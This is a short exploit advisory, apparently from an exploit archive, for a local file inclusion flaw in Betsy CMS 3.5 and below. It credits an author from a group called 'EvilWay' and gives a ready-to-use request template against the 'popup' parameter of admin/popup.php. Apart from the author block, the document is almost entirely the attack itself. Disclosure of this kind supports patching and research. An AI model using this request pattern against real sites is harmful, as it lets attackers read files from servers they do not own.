Betsy CMS versions 3.5 and below suffer from a local file inclusion vulnerability.
41542e3783234685da0bf139cebeb00029024c285c6a78ccdd9b651bb10e1318
/*
Author : MizoZ [from MA]
Group : EvilWay
Email : mizozx[at]gmail[dot]com
Greetz : Zuka !!
Good luck DZ :)
*/
The vulnerability is in the file admin/popup.php on the get $_GET['popup']
Exploit :
[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]